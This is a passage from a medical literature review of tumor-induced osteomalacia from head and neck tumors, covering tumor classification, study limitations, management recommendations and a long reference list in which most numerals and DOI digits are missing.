weidner et al. initially proposed the term phosphaturic mesenchymal tumors (pmt) and their classification into four distinct subtypes: (i) mixed connective tissue variant (mct), (ii) osteoblastoma-like, (iii) non-ossifying fibroma-like, and (iv) ossifying fibroma-like ( ). folpe et al. later reviewed all previously published cases and found that they all belong to the pmtmct category ( ); in this review we have reported the revised diagnoses as mentioned by folpe et al. subsequently, wu et al. described a new entity called "pmt mixed epithelial and connective tissue type", which is found exclusively in the alveolar bone of the maxilla and mandible ( ). they found this tumor to be more common in males and in patients < years of age. they proposed a revised diagnosis for six previously published cases under this new entity, but we have reported those cases according to the original reports. apart from pmts, other reported tumors causing tio in the head and neck region include meningioma, salivary basal cell adenoma, malignant schwannoma, ameloblastic fibrosarcoma, and spindle cell tumor with pmt features.

study limitations
to our knowledge, this is the largest review to date of tio due to tumors located in the head and neck region. the per-patient analysis method used in this study, with minute detailing of all clinically relevant published aspects, is its major strength. there are several limitations. as the review is a retrospective analysis of published case reports, all the limitations pertaining to retrospective studies apply. additionally, many case reports lacked important clinical details, as the majority of them focused on pathology or imaging. a meticulous attempt was made to include all published literature on the subject, but a few studies may not have been included.

summary
tio in the head and neck region is a rare disorder that warrants management by a multidisciplinary team including an endocrinologist, head and neck surgeon, radiologist, nuclear medicine physician and pathologist. low phosphorus with elevated fgf- levels in a patient with clinical features of osteomalacia and/or a mass in the head and neck region should be evaluated with ga-dota-based pet/ct imaging. an alternative approach is anatomical imaging followed by biopsy in a patient with local symptoms and clinically apparent swelling. complete surgical excision with a wide margin is of utmost importance in these cases, resulting in dramatic clinical and biochemical normalization. clinical and biochemical follow-up is necessary even after documented cure, as true recurrences have been reported. whenever complete excision is not achieved, repeat surgical excision is recommended for accessible disease burden. in inoperable cases, radiotherapy, prrt and medical management are suitable alternatives, which should be decided by a multidisciplinary team on an individual basis. although the tumor remains benign in most cases, one must remain vigilant in long-standing disease because of the reported risk of metastasis. histopathological examination in most cases reveals pmtmct, but other types are also seen.

declaration of interest
the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported.
funding this research has been supported by department of endocrinology, seth gs medical college & kem hospital, mumbai, india and diamond jubilee society trust (djst), kem hospital, mumbai, india. references drezner mk. tumor-induced osteomalacia. in primer on metabolic bone diseases and disorders of mineral metabolism, th ed., ch , pp – . ed. mj favus. philadelphia, pa, usa: lippincott-raven, . mccance r. osteomalacia with loosers nodes (milkman’s syndrome) due a raised resistance to vitamin d acquired about the age of years. quarterly journal of medicine – . chong wh, molinolo aa, chen cc & collins mt. tumor-induced osteomalacia. endocrine-related cancer r –r . (https://doi. org/ . /erc- - ) jiang y, xia wb, xing xp, silva bc, li m, wang o, zhang hb, li f, jing hl, zhong dr, et al. tumor‐induced osteomalacia: an important cause of adult‐onset hypophosphatemic osteomalacia in china: report of cases and review of the literature. journal of bone and mineral research – . (https://doi.org/ . / jbmr. ) renton p & shaw dg. hypophosphatemic osteomalacia secondary to vascular tumous of bone and soft tissue. skeletal radiology – . (https://doi.org/ . /bf ) sweet ra, males jl, hamstra aj & deluca hf. vitamin d metabolite levels in oncogenic osteomalacia. annals of internal medicine – . (https://doi.org/ . / - - - - ) nitzan dw, marmary y & azaz b. mandibular tumor-induced muscular weakness and osteomalacia. oral surgery, oral medicine, and oral pathology – . (https://doi.org/ . / - ( ) - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /erc- - https://doi.org/ . /erc- - https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /bf https://doi.org/ . / - - - - https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : nomura g, koshino y, morimoto h, kida h, nomura s & tamai k. vitamin d resistant hypophosphatemic osteomalacia associated with osteosarcoma of the mandible: report of a case. japanese journal of medicine – . (https://doi.org/ . / internalmedicine . . ) linsey m, smith w, yamauchi h & bernstein l. nasopharyngeal angiofibroma presenting as adult osteomalacia: case report and review of the literature. laryngoscope – . (https:// doi.org/ . /lary. . . . ) folpe al, fanburg-smith jc, billings sd, bisceglia m, bertoni f, cho jy, econs mj, inwards cy, jan de beur sm, mentzel t, et al. most osteomalacia-associated mesenchymal tumors are a single histopathologic entity: an analysis of cases and a comprehensive review of the literature. american journal of surgical pathology – . (https://doi.org/ . / - - ) seshadri ms, cornish cj, mason rs & posen s. parathyroid hormone like bioactivity in tumours from patients with oncogenic osteomalacia. clinical endocrinology – . (https://doi. org/ . /j. - . .tb .x) jefferis af, taylor pca & walsh-waring gp. tumour associated hypophosphatemic osteomalacia occurring in a patient with an odontogenic tumour of the maxilla. journal of laryngology and otology – . (https://doi.org/ . /s ) weidner n, bar rs, weiss d & strottmann mp. neoplastic pathology of oncogenic osteomalacia/rickets. cancer – . 
(https://doi.org/ . / - ( ) : < ::aid- cncr > . .co; -s) lee hk, sung ww, solodnik p & shimshi m. bone scan in tumour- induced osteomalacia. journal of nuclear medicine – . catalano pj, brandwein m, shah dk, urken ml, lawson w & biller hf. sinonasal hemangiopericytomas: a clinicopathologic and immunohistochemical study of seven cases. head and neck – . (https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z) wilkins ge, granleese s, hegele rg, holden j, anderson dw & bondy gp. oncogenic osteomalacia: evidence for a humoral phosphaturic factor. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) david k, revesz t, kratimenos g, krausz t & crockard ha. oncogenic osteomalacia associated with a meningeal phosphaturic mesenchymal tumour. journal of neurologicalsurgery – . kim yg, choi ys, lee sc & ryu dm. tumour-induced osteomalacia associated with lesions in the oral and maxillofacial region: report of two cases. journal of oral and maxillofacial surgery – . (https://doi.org/ . /s - ( ) - ) avila na, skarulis m, rubino dm & doppman jl. oncogenic osteomalacia: lesion detection by mr skeletal survey. american journal of roentgenology – . (https://doi.org/ . / ajr. . . ) yang im, park yk, hyun yj, kim dy, woo jt, kim sw, kim jw, kim ys & choi yk. oncogenic osteomalacia caused by a phosphaturic mesenchymal tumour of the oral cavity: a case report. korean journal of internal medicine – . (https://doi. org/ . /kjim. . . . ) gonzalez-compta x, manos-pujol m, foglia-fernandez m, peral e, condom e, claveguera t & dicenta-sousa m. oncogenic osteomalacia: case report and review of head and neck associated tumours. journal of laryngology and otology – . (https://doi.org/ . /s ) ohashi k, ohnishi t, ishikawa t, tani h, uesugi k & takagi m. oncogenic osteomalacia presenting as bilateral stress fractures of the tibia. skeletal radiology – . (https://doi.org/ . / s ) clunie gpr, fox pe & stamp tcb. four cases of acquired hypophosphatemic (oncogenic) osteomalacia. problems of diagnosis, treatment and long-term management. rheumatology – . (https://doi.org/ . / rheumatology/ . . ) sandhu fa & martuza rl. craniofacial hemangiopericytoma associated with oncogenic osteomalacia: case report. journal of neuro-oncology – . (https://doi. org/ . /a: ) reyes-mugica m, arnsmeier sl, backeljauw pf, persing j, ellis b & carpenter to. phosphaturic mesenchymal tumour-induced rickets. pediatric and developmental pathology – . (https://doi. org/ . /s ) kawai y, morimoto s, sakaguchi k, yoshino h, yotsui t, hirota s, inohara h, nakagawa t, hattori k, kubo t, et al. oncogenic osteomalacia secondary to nasal tumour with decreased urinary excretion of camp. journal of bone and mineral metabolism – . (https://doi.org/ . /s ) john mr, wickert h, zaar k, jonsson kb, grauer a, ruppersberger p, schmidt-gayk h, murer h, ziegler r & blind e. a case of neuroendocrine oncogenic osteomalacia associated with a phex and fibroblast growth factor- expressing sinusoidal malignant schwannoma. bone – . (https://doi.org/ . / s - ( ) - ) reis-filho js, paiva me & lopes jm. august : -year-old female with a -year history of osteomalacia and hypophosphatemia. brain pathology – , . (https://doi. org/ . /j. - . .tb .x) fuentealba c, pinto d, ballesteros f, pacheco d, boettiger o, soto n, fernandez w, gabler f, gonzales g & reginato aj. oncogenic hypophosphatemic osteomalacia associated with a nasal hemangiopericytoma. journal of clinical rheumatology – . (https://doi.org/ . / .rhu. . 
.ed) ungari c, rocchi g, rinna c, agrillo a, lattanzi a & pagnoni m. hypophosphaturic mesenchymal tumour of the ethmoid associated with oncogenic osteomalacia. journal of craniofacial surgery – . dupond jl, mahammedi h, magy n, blagosklonov o, meaux- ruault n & kantelip b. detection of a mesenchymal tumor responsible for hypophosphatemic osteomalacia using fdg-pet. european journal of internal medicine – . (https://doi. org/ . /j.ejim. . . ) kaylie dm, jackson cg & gardner ek. oncogenic osteomalacia caused by phosphaturic mesenchymal tumor of the temporal bone. otolaryngology–head and neck surgery – . (https://doi. org/ . /j.otohns. . . ) inokuchi g, tanimoto h, ishida h, sugimoto t, yamauchi m, miyauchi a & nibu k. a paranasal tumor associated with tumor- induced osteomalacia. laryngoscope – . (https:// doi.org/ . / .mlg. . . ) yoshioka k, nagata r, ueda m, yamaguchi t, konishi y, hosoi m, inoue t, yamanaka k, iwai y & sato t. phosphaturic mesenchymal tumor with symptoms related to osteomalacia that appeared one year after tumorectomy. internal medicine – . (https://doi.org/ . /internalmedicine. . ) koriyama n, nishimoto k, kodama t, nakazaki m, kurono y, yoshida h & tei c. oncogenic osteomalacia in a case with a maxillary sinus mesenchymal tumor. american journal of the medical sciences – . (https://doi.org/ . / - - ) elston ms, stewart ij, clifton-bligh r & conaglen jv. a case of oncogenic osteomalacia with preoperative secondary hyperparathyroidism: description of the biochemical response of fgf to octreotide therapy and surgery. bone – . (https://doi.org/ . /j.bone. . . ) beech tj, rokade a, gittoes n & johnson ap. a hemangiopericytoma of the ethmoid sinus causing oncogenic osteomalacia: a case report and review of the literature. international journal of oral and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /internalmedicine . . https://doi.org/ . /internalmedicine . . https://doi.org/ . /lary. . . . https://doi.org/ . /lary. . . . https://doi.org/ . / - - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . /s https://doi.org/ . / - ( ) : < ::aid-cncr > . .co; -s https://doi.org/ . / - ( ) : < ::aid-cncr > . .co; -s https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z https://doi.org/ . /jcem. . . https://doi.org/ . /s - ( ) - https://doi.org/ . /ajr. . . https://doi.org/ . /ajr. . . https://doi.org/ . /kjim. . . . https://doi.org/ . /kjim. . . . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /rheumatology/ . . https://doi.org/ . /rheumatology/ . . https://doi.org/ . /a: https://doi.org/ . /a: https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . / .rhu. . .ed https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.otohns. . . https://doi.org/ . /j.otohns. . . https://doi.org/ . / .mlg. . . https://doi.org/ . / .mlg. . . https://doi.org/ . /internalmedicine. . https://doi.org/ . / - - https://doi.org/ . / - - https://doi.org/ . /j.bone. . . https://creativecommons.org/licenses/by-nc/ . 
/ https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : maxillofacial surgery – . (https://doi.org/ . /j. ijom. . . ) ahn jm, kim hj, cha cm, kim j, yim sg & kim hj. oncogenic osteomalacia: induced by tumour, cured by surgery. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics – . (https://doi.org/ . /j.tripleo. . . ) uramoto n, furukawa m & yoshizaki t. malignant phosphaturic mesenchymal tumor, mixed connective tissue variant of the tongue. auris, nasus, larynx – . (https://doi.org/ . /j. anl. . . ) lewiecki em, urig ej & williams rc. tumor-induced osteomalacia: lessons learned. arthritis and rheumatism – . (https:// doi.org/ . /art. ) kenealy h, holdaway i & grey a. occult nasal sinus tumours causing oncogenic osteomalacia. european journal of internal medicine – . (https://doi.org/ . /j.ejim. . . ) yun ki, kim dh & pyo sw. a phosphaturic mesenchymal tumor of the floor of the mouth with oncogenic osteomalacia: report of a case. journal of oral and maxillofacial surgery – . (https:// doi.org/ . /j.joms. . . ) woo vl, landesberg r, imel ea, singer sr, folpe al, econs mj, kim t, harik lr & jacobs tp. phosphaturic mesenchymal tumor, mixed connective tissue variant, of the mandible: report of a case and review of the literature. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics – . (https:// doi.org/ . /j.tripleo. . . ) savage cr & zimmer la. oncogenic osteomalacia from pterygopalatine fossa mass. journal of laryngology and otology – . (https://doi.org/ . /s ) kurien r, manipadam mt & rupa v. oncogenic osteomalacia in a patient with an ethmoid sinus tumour. journal of laryngology and otology – . (https://doi.org/ . / s ) gupta r, sharma a, ksh a, khadgawat r & dinda ak. phosphaturic mesenchymal tumour of the sinonasal tract. acta endocrinologica (bucharest) – . (https://doi.org/ . /aeb. . ) gore mo, welch bj, geng w, kabbani w, maalouf nm, zerwekn je, moe ow & sakhaee k. renal phosphate wasting due to tumor- induced osteomalacia: a frequently delayed diagnosis. kidney international – . (https://doi.org/ . / ki. . ) kobayashi k, nakao k, kawai k, ito k, hukumoto s, asakage t, oota s & motoi r. tumor-induced osteomalacia originating from the temporal bone: a case report. head and neck – . (https://doi.org/ . /hed. ) shelekhova kv, kazakov dv & michal m. sinonasal phosphaturic mesenchymal tumor (mixed connective tissue variant): report of cases. american journal of surgical pathology – . (https://doi.org/ . /pas. b e d fa) pedrazzoli m, colletti g, ferrari m, rossetti g, moneghini l & autelitano l. mesenchymal phosphaturic neoplasm in the maxillary sinus: a case report. international journal of oral and maxillofacial surgery – . (https://doi.org/ . /j. ijom. . . ) mori y, ogasawara t, motoi t, shimizu y, chikazu d, tamura k, fukumoto s & takato t. tumor-induced osteomalacia associated with a maxillofacial tumor producing fibroblast growth factor : report of a case and review of the literature. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics e –e . (https:// doi.org/ . /j.tripleo. . . ) parshwanath ha, kulkarni pr, rao r, joshi sk & patil p. phosphaturic mesenchymal tumor of ethmoid sinus. indian journal of pathology and microbiology – . (https://doi.org/ . / - . ) battoo aj, salih s, unnikrish ag, jojo a, bahadur s, iyer s & kuriakose ma. oncogenic osteomalacia from nasal cavity giant cell tumor. 
head and neck – . (https://doi. org/ . /hed. ) arnaoutakis d & naseri i. sinonasal phosphaturic mesenchymal tumor: a rare and misinterpreted entity. journal of neurological surgery reports e –e . (https://doi. org/ . /s- - ) peters kb, mclendon r, morse ma & vredenburgh jj. treatment of recurrent intracranial hemangiopericytoma with src-related tyrosine kinase targeted therapy: a case report. case reports in oncology – . (https://doi.org/ . / ) akhter m, sugrue pa, bains r & khavkin ya. oncogenic osteomalacia of the cervical spine: a rare case of curative resection and reconstruction. journal of neurosurgery. spine – . (https://doi.org/ . / . .spine ) xian-ling w, jian-ming b, wen-wen z, zhao-hui l, jing-tao d, ju-ming l & yi-ming m. osteomalacia caused by tumors in facies cranii mimicking rheumatoid arthritis. rheumatology international – . (https://doi.org/ . /s - - - ) guglielmi g, bisceglia m, scillitani a & folpe al. oncogenic osteomalacia due to phosphaturic mesenchymal tumor of the craniofacial sinuses. clinical cases in mineral and bone metabolism – . uno t, kawai k, kunii n, fukumoto s, shibahara j, motoi t & saito n. osteomalacia caused by skull base tumors: report of cases. neurosurgery e –e ; discussion e . (https://doi. org/ . /neu. b e f ) andreupoulou p, dumitrescu ce, kelly mh, brillante ba, peck cmc, wodajo fm, chang r & collins mt. selective venous catheterization for the localization of phosphaturic mesenchymal tumors. journal of bone and mineral research – . bergwitz c, collins mt, kamath rs & rosenberg ae. case – : a -year-old man with hypophosphatemia. new england journal of medicine – . (https://doi.org/ . / nejmcpc ) monappa v, naik am, mathew m, rao l, rao sk, ramachandra l & padmapriya j. phosphaturic mesenchymal tumour of the mandible – the useful criteria for a diagnosis on fine needle aspiration cytology. cytopathology – . (https://doi.org/ . / cyt. ) chokyu i, ishibashi k, goto t & ohata k. oncogenic osteomalacia associated with mesenchymal tumor in the middle cranial fossa: a case report. journal of medical case reports . (https://doi. org/ . / - - - ) chiam p, tan hc, bee ym & chandran m. oncogenic osteomalacia – hypophosphatemic spectrum from benignancy to malignancy. bone – . (https://doi.org/ . /j.bone. . . ) cho s, do ny, yu sw & choi jy. nasal hemangiopericytoma causing oncogenic osteomalacia. clinical and experimental otolaryngology – . burnand h, samuels a, hagan i, sawant n & mutimer j. bilateral subtrochanteric fractures in tumor-induced osteomalacia caused by a nasal hemangiopericytoma. hip international – . (https://doi.org/ . /hip. . ) brandwein-gensler m & siegal gp. striking pathology gold: a singular experience with daily reverberations: sinonasal hemangiopericytoma (glomangiopericytoma) and oncogenic osteomalacia. head and neck pathology – . (https://doi.org/ . /s - - - ) munoz j, ortega rm, celzo f & donthireddy v. tumour-induced osteomalacia. bmj case reports bcr . (https:// doi.org/ . /bcr. . . ) chang cv, conde sj, luvizotto ram, nunes vs, bonates mc, felicio ac, lindsey sc, moraes fh, tagliarini jv, mazeto gmfs, et al. oncogenic osteomalacia: loss of hypophosphatemia might be the key to avoid misdiagnosis. arquivos brasileiros de endocrinologia e metabologia – . (https://doi.org/ . /s - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.anl. . . https://doi.org/ . /j.anl. . . https://doi.org/ . /art. https://doi.org/ . /art. https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.joms. . . https://doi.org/ . /j.joms. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /aeb. . https://doi.org/ . /ki. . https://doi.org/ . /ki. . https://doi.org/ . /hed. https://doi.org/ . /pas. b e d fa https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . / - . https://doi.org/ . / - . https://doi.org/ . /hed. https://doi.org/ . /hed. https://doi.org/ . /s- - https://doi.org/ . /s- - https://doi.org/ . / https://doi.org/ . / . .spine https://doi.org/ . /s - - - https://doi.org/ . /neu. b e f https://doi.org/ . /neu. b e f https://doi.org/ . /nejmcpc https://doi.org/ . /nejmcpc https://doi.org/ . /cyt. https://doi.org/ . /cyt. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /j.bone. . . https://doi.org/ . /hip. . https://doi.org/ . /s - - - https://doi.org/ . /bcr. . . https://doi.org/ . /bcr. . . https://doi.org/ . /s - https://doi.org/ . /s - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : jiang y, xia wb, xing xp, silva bc, li m, wang o, zhang hb, li f, jing hl, zhong dr, et al. tumor-induced osteomalacia: an important cause of adult-onset hypophosphatemic osteomalacia in china: report of cases and review of the literature. journal of bone and mineral research – . (https://doi.org/ . / jbmr. ) fatani ha, sunbuli m, lai sy & bell d. phosphaturic mesenchymal tumor: a report of patients treated at a single institution and comparison with reported series. annals of diagnostic pathology – . (https://doi.org/ . /j.anndiagpath. . . ) mathis da, stehel ej, beshay je, mickey be, folpe al & raisanen j. intracranial phosphaturic mesenchymal tumors: report of cases. journal of neurosurgery – . (https://doi. org/ . / . .jns ) tarasova vd, trepp-carrasco ag, thompson r, recker rr, chong wh, collins mt & armas la. successful treatment of tumor-induced osteomalacia due to an intracranial tumor by fractionated stereotactic radiotherapy. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) papierska l, Ćwikła jb, misiorowski w, rabijewski m, sikora k & wanyura h. unusual case of phosphaturic mesenchymal tumor. polskie archiwum medycyny wewnetrznej – . (https:// doi.org/ . /pamw. ) lee gg, dhong hj, park ys & ko yh. sinonasal glomangiopericytoma causing oncogenic osteomalacia. clinical and experimental otorhinolaryngology – . (https://doi. org/ . /ceo. . . . ) allevi f, rabbiosi d, mandala m & colletti g. mesenchymal phosphaturic tumour: early detection of recurrence. bmj case reports bcr . (https://doi.org/ . /bcr- - ) annamalai ak, sampathkumar k, kane s, shetty ns, kulkarni s, rangarajan v, purandare n, pai ps, mahuvakar ad, shanthi r, et al. needles in the haystack – synchronous multifocal tumor-induced osteomalacia. journal of clinical endocrinology and metabolism – . 
(https://doi.org/ . /jc. - ) okamiya t, takahashi k, kamada h, hirato j, motoi t, fukumoto s & chikamatsu k. oncogenic osteomalacia caused by an occult paranasal sinus tumor. auris, nasus, larynx – . (https://doi.org/ . /j.anl. . . ) mok y, lee jc, lum jhy & petersson f. from epistaxis to bone pain – report of two cases illustrating the clinicopathological spectrum of phosphaturic mesenchymal tumor with fibroblast growth factor receptor immunohistochemical and cytogenetic analyses. histopathology – . (https://doi.org/ . / his. ) fernandez-cooke e, cruz-rojo j, gallego c, romance ai, mosqueda- pena r, almaden y & del pozo js. tumor-induced rickets in a child with a central giant cell granuloma: a case report. pediatrics e –e . (https://doi.org/ . /peds. - ) fathalla h, cusimano m, di leva a, karamchandani j, fung r & kovacs k. osteomalacia-inducing tumors of the brain: a case report, review and a hypothesis. world neurosurgery .e – .e . (https://doi.org/ . /j.wneu. . . ) ray s, chakraborty pp, biswas k, ghosh s, mukhopadhyay s & chowdhury s. a case of oncogenic osteomalacia due to occult nasal sinus tumor. clinical cases in mineral and bone metabolism – . (https://doi.org/ . /ccmbm/ . . . ) qari h, hamao-sakamoto a, fuselier c, cheng ysl, kessler h & wright j. phosphaturic mesenchymal tumor: new oral cases and review of cases in the head and neck. head and neck pathology – . (https://doi.org/ . /s - - - ) wasserman jk, purgina b, lai ck, gravel d, mahaffey a, bell d & chiosea si. phosphaturic mesenchymal tumor involving the head and neck: a report of five cases with fgfr fluorescence in situ hybridization analysis. head and neck pathology – . (https://doi.org/ . /s - - - ) mani mk & panigrahi mk. unusual calvarial tumour-oncogenic osteomalacia. british journal of neurosurgery – . (https://doi.org/ . / . . ) yu wj, he jw, fu wz, wang c & zhang zl. reports of chinese patients with tumor-induced osteomalacia. journal of bone and mineral metabolism – . (https://doi.org/ . / s - - - ) takashi y, kinoshita y, ito n, taguchi m, takahashi m, egami n, tajima s, nangaku m & fukumoto s. tumor-induced osteomalacia caused by a parotid tumor. internal medicine – . (https://doi.org/ . /internalmedicine. . ) gresham ms, shen s, zhang yj & gallagher k. anterior skull base glomangioma-induced osteomalacia. journal of neurological surgery reports e –e . (https://doi. org/ . /s- - ) agaimy a, michal m, chiosea s, petersson f, hadravsky l, kristiansen g, horch re, schmolders j, hartmann a, haller f, et al. phosphaturic mesenchymal tumors: clinicopathologic, immunohistochemical and molecular analysis of cases expanding their morphologic and immunophenotypic spectrum. american journal of surgical pathology – . (https://doi. org/ . /pas. ) lee jy, park hs, han s, lim jk, hong n, park si & rhee y. localization of oncogenic osteomalacia by systemic venous sampling of fibroblast growth factor . yonsei medical journal – . (https://doi.org/ . /ymj. . . . ) schober hc, kneitz c, fieber f, hesse k & schroeder h. selective blood sampling for fgf- in tumor-induced osteomalacia. endocrinology, diabetes and metabolism case reports . (https://doi.org/ . /edm- - ) zuo qy, wang h, li w, niu xh, huang yh, chen j, you yh, liu by, cui am & deng w. treatment and outcomes of tumor- induced osteomalacia associated with phosphaturic mesenchymal tumors: retrospective review of patients. bmc musculoskeletal disorders . (https://doi.org/ . /s - - - ) hana t, tanaka s, nakatomi h, shojima m, fukumoto s, ikemura m & saito n. 
definitive surgical treatment of osteomalacia induced by skull base tumor and determination of the half-life of serum fibroblast growth factor . endocrine journal – . (https://doi.org/ . /endocrj.ej - ) chanukya gv, mengade m, goud j, rao is & jain a. tumor- induced osteomalacia: a sherlock holmes approach to diagnosis and management. annals of maxillofacial surgery – . (https://doi.org/ . /ams.ams_ _ ) gonzalez g, baudrand r, sepulveda mf, vucetich n, guarda fj, villanueva p, contreras o, villa a, salech f, toro l, et al. tumor- induced osteomalacia: experience from a south american academic centre. osteoporosis international – . (https://doi. org/ . /s - - - ) singh d, chopra a, ravina m, kongara s, bhatia e, kumar n, gupta s, yadav s, dabadghao p, yadav r, et al. oncogenic osteomalacia: role of ga- dotanoc pet/ct scan in identifying the culprit lesion and its management. british journal of radiology . (https://doi.org/ . /bjr. ) pelletier k, troyanov s, guite jf, sainte-marie lg, roberge d & lessard m. localization of ectopic fibroblast growth factor production in tumor-induced osteomalacia using selective venous samplings. clinical nephrology – . (https://doi. org/ . /cn ) mumford e, marks j, wagner t, gallimore a, gane s & walsh sb. oncogenic osteomalacia: diagnosis, localisation, and cure. lancet oncology e . (https://doi.org/ . /s - ( ) - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /j.anndiagpath. . . https://doi.org/ . / . .jns https://doi.org/ . / . .jns https://doi.org/ . /jc. - https://doi.org/ . /pamw. https://doi.org/ . /pamw. https://doi.org/ . /ceo. . . . https://doi.org/ . /ceo. . . . https://doi.org/ . /bcr- - https://doi.org/ . /bcr- - https://doi.org/ . /jc. - https://doi.org/ . /j.anl. . . https://doi.org/ . /his. https://doi.org/ . /his. https://doi.org/ . /peds. - https://doi.org/ . /j.wneu. . . https://doi.org/ . /ccmbm/ . . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . / . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /internalmedicine. . https://doi.org/ . /s- - https://doi.org/ . /s- - https://doi.org/ . /pas. https://doi.org/ . /pas. https://doi.org/ . /ymj. . . . https://doi.org/ . /edm- - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /endocrj.ej - https://doi.org/ . /ams.ams_ _ https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /bjr. https://doi.org/ . /cn https://doi.org/ . /cn https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : villepelet a, casiraghi o, temam s & moya-plana a. ethmoid tumor and oncogenic osteomalacia: case report and review of the literature. european annals of otorhinolaryngology, head and neck diseases – . (https://doi.org/ . /j. anorl. . . ) pelo s, gasparini g, garagiola u, d’amato g, saponaro g, doneddu p, todaro m & moro a. phosphaturic mesenchymal tumor, an unusual localization in head and neck. journal of surgical case reports rjy . (https://doi.org/ . 
/jscr/rjy ) he q, xu z, zhang b, hu w & zhang x. tumor-induced osteomalacia caused by a parotid basal cell adenoma detected by ga-dotanoc pet/ct. clinical nuclear medicine e –e . (https://doi.org/ . /rlu. ) wu h, bui mm, zhou l, li d, zhang h & zhong d. phosphaturic mesenchymal tumor with an admixture of epithelial and mesenchymal elements in the jaws: clinicopathological and immunohistochemical analysis of cases with literature review. modern pathology – . (https://doi.org/ . /s - - - ) ding j, hu g, wang l, li f & huo l. increased activity due to fractures does not significantly affect the accuracy of ga-dotatate pet/ct in the detection of culprit tumor in the evaluation of tumor-induced osteomalacia. clinical nuclear medicine – . (https://doi.org/ . / rlu. ) mishra t, desouza ma, patel k & mazumdar ga. phosphaturic mesenchymal tumors involving skull bones: report of two rare cases. asian journal of neurosurgery – . (https://doi. org/ . /ajns.ajns_ _ ) li j, huang y, yang f, zhang q, chen d & wang q. sinonasal hemangiopericytoma caused hypophosphatemic osteomalacia: a case report. medicine e . (https://doi.org/ . / md. ) acharya rp, won am, moon bs, flint jh, roubaud ms, williams md, hessel ac, murphy jr wa, chambers ms & gagel rf. tumor‐induced hypophosphatemic osteomalacia caused by a mesenchymal tumor of the mandible managed by a segmental mandibulectomy and microvascular reconstruction with a free fibula flap. head and neck e –e . (https://doi.org/ . /hed. ) kurien r, rupa v & thomas m. varied presentation of sinonasal phosphaturic mesenchymal tumour: report of a case series with follow-up. european archives of oto-rhino-laryngology – . (https://doi.org/ . /s - - - ) paul j, cherian ke, kapoor n & paul tv. treating osteoporosis: a near miss in an unusual case of fgf- mediated bone loss. bmj case reports e . (https://doi.org/ . /bcr- - ) pal r, bhadada sk, singhare a, bhansali a, kamalanathan s, chadha m, chauhan p, sood a, dhiman v, sharma dc, et al. tumor-induced osteomalacia: experience from three tertiary care centers in india. endocrine connections – . (https://doi. org/ . /ec- - ) jadhav s, kasaliwal r, lele v, rangarajan v, chandra p, shah h, malhotra g, jagtap vs, budyal s, lila ar, et al. functional imaging in primary tumour-induced osteomalacia: relative performance of fdg pet/ct vs somatostatin receptor-based functional scans: a series of nine patients. clinical endocrinology – . (https://doi. org/ . /cen. ) agrawal k, bhadada s, mittal br, shukla j, sood a, bhattacharya a & bhansali a. comparison of f-fdg and ga dotatate pet/ ct in localization of tumor causing oncogenic osteomalacia. clinical nuclear medicine e –e . (https://doi.org/ . / rlu. ) el-maouche d, sadowski sm, papadakis gz, guthrie l, cottle- delisle c, merkel r, millo c, chen cc, kebebew e & collins mt. ga-dotatate for tumor localization in tumor-induced osteomalacia. journal of clinical 